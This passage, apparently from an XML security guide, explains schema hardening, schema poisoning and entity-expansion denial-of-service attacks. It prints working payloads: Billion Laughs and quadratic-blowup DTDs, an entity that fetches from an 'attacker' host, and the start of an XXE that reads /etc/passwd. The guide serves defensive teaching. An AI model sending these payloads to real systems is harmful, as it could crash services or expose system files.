    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, available in XML Schema 1.1, constrain the existence and values of related elements and attributes in XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Failing to define a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
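&lt;br /&gt;
As a sketch of the bounded alternative, the same schema can cap the number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. The limit of 100 is an assumption chosen for illustration; an appropriate value depends on what the application can process:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed cap: at most 100 buy elements per operation --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A document carrying more &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements than the cap fails validation before the application starts processing the items.&lt;br /&gt;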
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. An embedded schema serves only as a suggestion for how to structure a document; to be used safely, there must be a way to check its integrity.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to modify it. This vulnerability is not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
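&lt;br /&gt;
A deployment check can flag schema files with permissions like the ones listed above. The following Python sketch is a minimal example under the assumption of a POSIX filesystem; the function name &amp;lt;tt&amp;gt;writable_by_group_or_others&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import os
import stat


def writable_by_group_or_others(path):
    """Return True when the file's mode grants write access beyond its owner."""
    perms = stat.filemode(os.stat(path).st_mode)  # same layout as ls -l, e.g. "-rw-rw-rw-"
    # perms[5] is the group write flag, perms[8] is the write flag for others
    return perms[5] == "w" or perms[8] == "w"
```

A schema file for which this function returns &amp;lt;tt&amp;gt;True&amp;lt;/tt&amp;gt; can be altered by accounts other than its owner and deserves a closer look.&lt;br /&gt;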
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so the connection could be sniffed and the schema modified before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with that hostname. In this case, the software enables an attacker to redirect content to IP addresses under their control.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the DTD describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
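&lt;br /&gt;
The asymmetry between what the attacker sends and what the parser must hold can be checked with simple arithmetic. The following Python sketch uses the figures from the example above; the function names are illustrative, and markup overhead such as the DOCTYPE declaration is ignored:&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000    # characters in the entity A
REFERENCE_COUNT = 100_000  # times the entity is referenced in the document body
REFERENCE_LENGTH = 3       # each reference is an ampersand, the letter A and a semicolon


def sent_size(entity_length, reference_count, reference_length=REFERENCE_LENGTH):
    """Approximate number of characters the attacker transmits."""
    return entity_length + reference_count * reference_length


def expanded_size(entity_length, reference_count):
    """Number of characters the parser holds after expanding every reference."""
    return entity_length * reference_count


sent = sent_size(ENTITY_LENGTH, REFERENCE_COUNT)          # 400_000
expanded = expanded_size(ENTITY_LENGTH, REFERENCE_COUNT)  # 10_000_000_000
amplification = expanded // sent                          # 25_000
```

Under these assumptions, a document of roughly 400,000 characters expands to 10^10 characters, an amplification factor of about 25,000.&lt;br /&gt;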
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities defined in the following code, it will cause the application to consume all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of those expands to 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
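&lt;br /&gt;
The size of the expansion follows directly from the number of nesting levels. The following Python sketch reproduces the calculation for the document above; the constant and function names are illustrative only:&lt;br /&gt;

```python
BASE = "LOL"  # text of the innermost entity
FANOUT = 10   # references contained in each entity definition
LEVELS = 9    # LOL1 through LOL9


def copies_after(levels, fanout=FANOUT):
    """Number of copies of the base text once `levels` nested entities are expanded."""
    return fanout ** levels


copies = copies_after(LEVELS)    # 1_000_000_000
characters = copies * len(BASE)  # 3_000_000_000
```

Each additional level multiplies the result by ten, which is why a document of a few hundred characters is enough to exhaust memory.&lt;br /&gt;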
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
